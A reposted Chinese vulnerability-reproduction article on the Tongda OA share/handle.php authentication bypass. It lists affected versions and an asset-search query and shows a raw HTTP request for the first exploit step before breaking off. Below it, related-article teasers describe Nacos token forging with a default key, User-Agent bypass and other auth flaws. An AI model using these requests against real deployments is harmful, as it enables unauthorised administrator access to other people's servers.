【漏洞复现-通达OA】通达OA share身份认证绕过漏洞

这篇具有很好参考价值的文章主要介绍了【漏洞复现-通达OA】通达OA share身份认证绕过漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。

二、影响版本

● 通达OA2017-通达OA11.8

三、资产测绘

● hunter:app.name="通达 OA"
● 登录页面
【漏洞复现-通达OA】通达OA share身份认证绕过漏洞,漏洞复现,通达,身份认证绕过

四、漏洞复现

  1. 获取share_id
GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

【漏洞复现-通达OA】通达OA share身份认证绕过漏洞,漏洞复现,通达,身份认证绕过文章来源地址https://www.toymoban.com/news/detail-826283.html

    到了这里,关于【漏洞复现-通达OA】通达OA share身份认证绕过漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

    本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

    领支付宝红包 赞助服务器费用

    相关文章

    • 【严重】Grafana Azure AD环境身份认证绕过漏洞

       Grafana 是一个跨平台、开源的数据可视化网络应用平台。Azure AD 是由微软提供的一种云身份验证和访问管理服务。 在 Azure AD 中,多个用户可以拥有相同的电子邮件地址。攻击者可以创建一个与目标 Grafana 账户相同的电子邮件地址的恶意帐户,并且在 Azure AD 中配置支持多租户

      2024年02月17日
      浏览(29)
    • Apache Superset 身份认证绕过漏洞(CVE-2023-27524)

      Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KE

      2024年02月09日
      浏览(45)
    • 【备忘录】修复docker环境下的nacos安全漏洞:身份认证绕过漏洞

      报告截取内容如下 1.1 访问登录口用户名输入nacos密码输入任意值,进行抓包 1.2 伪造登录凭证 添加有效登录时间戳 登录信息中 在payload中输入nacos与时间戳 并添加入naco s默认密钥 SecretKey012345678901234567890123456789012345678901234567890123456789 同时选中base64加密 点击生成 1.3 登录包中新

      2024年02月01日
      浏览(31)
    • NACOS身份认证绕过

      一、漏洞描述 Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。攻击者通过添加Nacos-Server的User-Agent头部将可绕过(nacos.core.auth.enabled=true)鉴权认证,从而进行API操作。 二、漏洞利用 访问 http://xxxxx/nacos/v1/auth/users?username=testpassword=test ,并使用burpsuite进行抓包,将方法

      2024年02月16日
      浏览(29)
    • 【漏洞复现-通达OA】通达OA get_contactlist.php 敏感信息泄漏漏洞

      通达OA get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。 ● 通达OA2013 ● hunter app.name=\\\"通达 OA\\\" ● 特征 四、漏洞复现

      2024年02月20日
      浏览(33)
    • 【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

      通达OA get_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。 ● 通达OA2011 ● hunter app.name=\\\"通达 OA\\\" ● 特征

      2024年02月21日
      浏览(40)
    • 通达OA前台任意用户登录漏洞复现

      通达OA是一套国内常用的办公系统,此次安全更新修复的高危漏洞为任意用户登录漏洞。攻击者在远程且未经授权的情况下,通过利用此漏洞,可以直接以任意用户登录系统。 通达OA11.5 通达OA 2017版本 1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe,安装,访问,如下,安装成

      2024年02月11日
      浏览(43)
    • 宁盾统一身份中台助力某集团公司实现统一身份认证和管理(如泛微OA、微软AD)

      某集团公司是一家以钢铁为主业,涉足互联网金融、文化健康、智慧城市、现代物流等多领域的大型现代化企业集团。创业发展已有三十余年,拥有员工人数超万人,为了提升管理效率,同时实现国产化创新和数字化转型,公司采用了泛微OA和微软AD作为两套账号管理系统。泛

      2024年02月04日
      浏览(35)
    • 通达OA v11.9 getdata任意命令执行漏洞复现+利用

            通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和

      2024年02月05日
      浏览(78)
    • Nacos身份认证漏洞

      公司Nacos版本有用的2.0.1和2.0.3的都复现了身份认证的漏洞,无需认证身份就可以查看用户列表以及注册新用户,并且注册上来的新用户可以查看所有public命名空间下的配置资源! 1、查看用户列表 URL: http://ip:8848/nacos/v1/auth/users?pageNo=1pageSize=1 方法类型:GET 返回结果: 如图示

      2023年04月10日
      浏览(33)

    觉得文章有用就打赏一下文章作者

    支付宝扫一扫打赏

    博客赞助

    微信扫一扫打赏

    请作者喝杯咖啡吧~博客赞助

    支付宝扫一扫领取红包,优惠每天领

    二维码1

    领取红包

    二维码2

    领红包